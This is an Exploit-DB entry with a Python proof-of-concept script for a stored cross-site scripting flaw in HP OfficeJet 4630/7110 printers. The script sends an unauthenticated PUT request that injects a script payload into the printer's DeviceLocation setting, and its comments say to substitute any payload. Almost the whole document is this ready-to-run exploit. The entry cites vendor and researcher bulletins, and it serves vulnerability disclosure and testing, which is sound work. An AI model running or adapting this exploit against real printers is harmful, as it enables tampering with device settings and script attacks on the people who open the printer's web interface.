HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)

EDB-ID:

50227




Platform:

Hardware

Date:

2021-08-25


# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS)
# Date: 01/08/2021
# Exploit Author: Tyler Butler
# Vendor Homepage: https://www8.hp.com/
# Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742
# Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630
# Version: HP OfficeJet 7110 Wide Format ePrinter
# Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A

# PoC:
import requests
import json
from requests.exceptions import HTTPError

target = 'http://192.168.223.1'   # The IP of the vulnerable taget 
payload = '''<script>alert('XSS');</script>'''  # The XSS injection payload you want to use 
path='/DevMgmt/ProductConfigDyn.xml'   # Path location of the PUT command
pre = '''
<?xml version="1.0" encoding="UTF-8"?>
<!-- THIS DATA SUBJECT TO DISCLAIMER(S) INCLUDED WITH THE PRODUCT OF ORIGIN. -->
<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd">
	<prdcfgdyn2:ProductSettings>
		<prdcfgdyn:DeviceInformation>
			<dd:DeviceLocation>
'''  # The start of the request body
post = '''
            </dd:DeviceLocation>
		</prdcfgdyn:DeviceInformation>
	</prdcfgdyn2:ProductSettings>	
</prdcfgdyn2:ProductConfigDyn>
'''   # The end of the request body 
body = pre + payload + post


headers = {
            'Host':'192.168.223.1', 
            'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
            'Accept':'*/*',
            'Accept-Language':'en-US,en;q=0.5',
            'Accept-Encoding':'gzip, deflate',
            'Content-Type':'text/xml',
            'Content-Length':str(len(body.encode('utf-8'))),
            'Origin':'https://192.168.223.1',
            'Connection':'close',
            'Referer':target,
        }

print('{!} Starting HP Officejet 4630 XSS Injector .... \n    Author: Tyler Butler\n    @tbutler0x90')
try:
    print('{!} Injecting payload :',payload)
    response = requests.put(target+path, headers = headers, data = body)
    response.raise_for_status()
except HTTPError as http_err:
    print('{X}',f'HTTP error occurred: {http_err}') 
except Exception as err:
    print('{X}',f'Other error occurred: {err}')
else:
    print('{!} Success!')